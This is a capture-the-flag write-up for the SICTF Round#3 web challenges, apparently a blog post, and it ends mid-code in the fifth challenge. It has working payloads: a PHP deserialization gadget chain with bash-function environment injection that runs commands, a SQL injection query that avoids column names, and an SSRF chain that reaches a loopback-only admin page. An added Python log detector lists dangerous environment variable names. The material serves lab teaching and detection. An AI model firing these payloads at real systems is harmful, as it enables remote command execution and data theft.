SICTF Round#3 (Web track)

2. 面试前必看的一本书籍 (A Book to Read Before Your Interview)

The source code is as follows:

```php
<?php
highlight_file(__FILE__);

class start
{
    public $welcome;
    public $you;

    public function __destruct()
    {
        $this->begin0fweb();
    }

    public function begin0fweb()
    {
        $p = 'hacker!';
        $this->welcome->you = $p;
    }
}

class SE
{
    public $year;

    public function __set($name, $value)
    {
        echo ' Welcome to new year! ';
        echo($this->year);
    }
}

class CR
{
    public $last;
    public $newyear;

    public function __tostring()
    {
        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i', $this->newyear)) {
            echo "empty it!";
            return 0;
        }
        if (preg_match('/^.*(worries).*$/', $this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET
{
    public function __isset($name)
    {
        foreach ($_GET['get'] as $inject => $rce) {
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}

if (isset($_REQUEST['go'])) {
    unserialize(base64_decode($_REQUEST['go']));
}
?>
```

POC:

```php
<?php
// Gadget chain: start::__destruct -> SE::__set -> CR::__tostring -> ET::__isset
class start
{
    public $welcome;
    function __construct()
    {
        $this->welcome = new SE;   // "$this->welcome->you = $p" triggers SE::__set
    }
}

class SE
{
    public $year;
    function __construct()
    {
        $this->year = new CR;      // echo($this->year) triggers CR::__tostring
    }
}

class CR
{
    public $last;
    // The leading "\n" lets /worries/i match while /^.*(worries).*$/ fails
    // ('.' does not match a newline), so execution reaches the else branch
    public $newyear = "\nworries";
    function __construct()
    {
        $this->last = new ET;      // empty() on a missing property triggers ET::__isset
    }
}

class ET
{
}

echo base64_encode(serialize(new start));
?>
```

Key code:

```php
public function __isset($name)
{
    foreach ($_GET['get'] as $inject => $rce) {
        putenv("{$inject}={$rce}");
    }
    system("echo \"Haven't you get the secret?\"");
}
```

This involves environment variable injection; see P神's blog post 环境变量注入 (Environment Variable Injection).
Payload:

?go=Tzo1OiJzdGFydCI6MTp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX19&get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/ffffllllllaaaaaaaaaaaaaaaaaaggggg;%20}
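An added example, not from the original write-up: a Python detector for the two request shapes this challenge uses, a base64-encoded serialized PHP object in `go` and an environment-variable name such as `BASH_FUNC_echo%%` smuggled in as a `get[...]` key. It also flags the raw serialized-object form that the later EZ_SSRF PoC uses. The access-log lines are constructed, and the list of dangerous variable names is an assumption based on what a spawned shell and the dynamic loader honour.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the challenge server): line 1 reuses the
# write-up's base64 `go` payload plus a BASH_FUNC_echo%% key, line 2 is benign,
# line 3 carries a raw serialized object like the EZ_SSRF PoC.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2024:10:01:02 +0000] "GET /index.php?go=Tzo1OiJzdGFydCI6MTp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX19&get[BASH_FUNC_echo%25%25]=()%20{%20id;%20} HTTP/1.1" 200 512
10.0.0.7 - - [12/Feb/2024:10:01:09 +0000] "GET /index.php?go=aGVsbG8= HTTP/1.1" 200 128
10.0.0.9 - - [12/Feb/2024:10:02:00 +0000] "GET /ssrf.php?Harder=O:6:%22client%22:1:{s:3:%22url%22;s:26:%22http://127.0.0.1/admin.php%22;} HTTP/1.1" 200 64
"""

# Names that change what a spawned shell or the dynamic loader does (assumed list).
# BASH_FUNC_name%% is an exported bash function and only fires when the shell that
# system() spawns is bash, but a client-controlled putenv() of any of these is worth an alert.
DANGEROUS_ENV = {"BASH_ENV", "ENV", "PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "SHELLOPTS", "PS4"}
BASH_FUNC_RE = re.compile(r"^BASH_FUNC_[A-Za-z_][A-Za-z0-9_]*%%$")
PHP_OBJECT_RE = re.compile(r'^[OC]:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')  # e.g. O:5:"start":1:{
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def param_names(key):
    """Split a PHP array-style key such as get[BASH_FUNC_echo%%] into its parts."""
    return [part for part in re.split(r"[\[\]]", key) if part]

def php_object_payload(value):
    """True if value is, or base64-decodes to, a serialized PHP object."""
    if PHP_OBJECT_RE.match(value):
        return True
    try:  # '+' may have become ' ' during form decoding; restore it first
        decoded = base64.b64decode(value.replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return False
    return PHP_OBJECT_RE.match(decoded.decode("latin-1")) is not None

def analyze_request(line):
    """Return findings for one access-log line; an empty list means clean."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    for key, values in query.items():
        for name in param_names(key):
            if name in DANGEROUS_ENV or BASH_FUNC_RE.match(name):
                findings.append("env-injection:" + name)
        if any(php_object_payload(v) for v in values):
            findings.append("php-object:" + key)
    return findings
```

Run analyze_request over each access-log line; any non-empty result is a request worth pulling the full entry for.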


3. hacker (injection without column names)

The challenge tests SQL injection. information_schema is filtered, so we use injection without column names (无列名注入).
Payload:

?username=1.1'/**/union/**/select/**/group_concat(2)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)a%23


4. EZ_SSRF (SSRF)

```php
<?php
highlight_file(__file__);
error_reporting(0);

function get($url)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($curl);
    curl_close($curl);
    echo base64_encode($data);
    return $data;
}

class client
{
    public $url;
    public $payload;

    public function __construct()
    {
        $url = "http://127.0.0.1/";
        $payload = "system(\"cat /flag\");";
        echo "Exploit";
    }

    public function __destruct()
    {
        get($this->url);
    }
}

// hint:hide other file
if (isset($_GET['Harder'])) {
    unserialize($_GET['Harder']);
} else {
    echo "You don't know how to pass parameters?";
}
?>
```

This is an echoing SSRF (the response comes back base64-encoded), but fetching /flag directly returns nothing. Following the hint "hide other file", a directory scan showed that admin.php and flag.php also exist. admin.php contains:

```php
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
$allowed_ip = "127.0.0.1";
if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
    die("You can't get flag");
} else {
    echo $flag;
}
?>
```

So the flag is printed when $_SERVER['REMOTE_ADDR'] equals 127.0.0.1, but $_SERVER['REMOTE_ADDR'] cannot be forged by the client. With the SSRF we can use the target itself as a pivot: the server requests /admin.php over its own loopback interface, so the check passes.
POC:

```php
<?php
class client
{
    public $url = "http://127.0.0.1/admin.php";
}
echo serialize(new client);
?>
```

The flag is obtained successfully.

5. Oyst3rPHP (md5, preg_match, TP6 deserialization POP chain)

The favicon.ico identifies the site as ThinkPHP. Running a ThinkPHP vulnerability scanner first turned up nothing. A directory scan found a www.zip file.
From it we get the contents of app\controller\Index.php:

```php
<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
        echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
        echo "
```

(The rest of Index.php is cut off at this point in the page.)